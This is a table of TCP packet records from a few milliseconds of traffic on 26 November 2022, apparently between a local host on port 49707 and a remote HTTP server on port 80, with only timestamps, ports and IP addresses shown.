Nov 26, 2022 11:17:42.677360058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.677412033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.677509069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.677619934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.677673101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.677753925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.677876949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.677947998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.677982092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.678076029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678181887 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.678211927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678343058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678365946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678390026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678414106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678422928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.678437948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678452015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.678461075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678484917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678499937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.678507090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678531885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678555012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678565025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.678577900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678589106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.678602934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678627014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678649902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678654909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.678673029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678683996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.678695917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678720951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678742886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678754091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.678766966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678775072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.678791046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678812981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678821087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.678837061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678860903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678895950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.678900003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678916931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.678924084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678949118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678972006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.678994894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679004908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679018021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679028034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679040909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679064035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679065943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679086924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679110050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679132938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679133892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679155111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679157019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679208994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679233074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679251909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679255962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679276943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679280043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679302931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679325104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679348946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679349899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679371119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679374933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679394960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679418087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679440022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679441929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679461956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679462910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679486990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679510117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679529905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679533005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679557085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679560900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679579973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679603100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679627895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679635048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679651022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679656982 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679675102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679697990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679718971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679721117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679740906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.679744005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679766893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.679812908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.680685997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.680704117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.680722952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.680742025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.680752993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.680759907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.680778980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.680797100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.680798054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.680830002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.680855989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.680906057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.680924892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.680942059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.680959940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.680979013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.680984020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.680998087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681010962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681016922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681035042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681051970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681052923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681071997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681086063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681092024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681109905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681123018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681129932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681148052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681165934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681180000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681181908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681193113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681210995 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681220055 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681380033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681396961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681447029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681452990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681472063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681503057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681534052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681554079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681571960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681591034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681606054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681610107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681628942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681634903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681647062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681664944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681668997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681684971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681696892 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681703091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681721926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681740999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681751013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681761026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681777000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681777954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681797981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681812048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681817055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681835890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681849003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681855917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681874990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681895018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681914091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681929111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681929111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.681931973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.681982994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.682566881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682586908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682605982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682626009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682627916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.682645082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682663918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682672024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.682699919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.682759047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682776928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682795048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682811975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.682813883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682835102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682853937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682863951 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.682873011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682888985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.682903051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682921886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682931900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.682970047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.682986975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683005095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683020115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683023930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683043003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683046103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683060884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683070898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683079958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683099985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683110952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683119059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683139086 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683322906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683444023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683463097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683480978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683499098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683502913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683516979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683537006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683547974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683557034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683577061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683577061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683593988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683595896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683615923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683628082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683634996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683653116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683670998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683681965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683691025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683705091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683707952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683726072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683728933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683743954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683762074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683774948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683783054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683800936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683821917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683825970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683840036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683852911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.683859110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.683881044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.684303045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684355974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.684421062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684439898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684458971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684477091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684495926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684513092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.684544086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684545994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.684562922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684581041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684591055 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.684598923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684617996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684638023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684650898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.684657097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684670925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.684674978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684694052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684708118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.684714079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684751034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684763908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.684770107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684789896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684798002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.684808016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684856892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684861898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.684876919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684895992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684899092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.684921980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.684967041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.685554028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685573101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685591936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685607910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.685610056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685638905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.685688019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685705900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685724974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685744047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685744047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.685777903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685780048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.685796022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685817003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685827017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.685834885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685853004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685873032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685904026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685906887 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.685921907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685941935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685950041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.685960054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685977936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.685985088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.685996056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686016083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686034918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686048031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.686052084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686073065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686075926 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.686103106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.686368942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686388969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686419964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.686465979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686484098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686501980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686508894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.686626911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686645985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686664104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686671972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.686683893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686700106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.686702967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686722040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686726093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.686741114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686759949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.686772108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.686779022 CET	80	49707	66.235.200.147	192.168.2.5
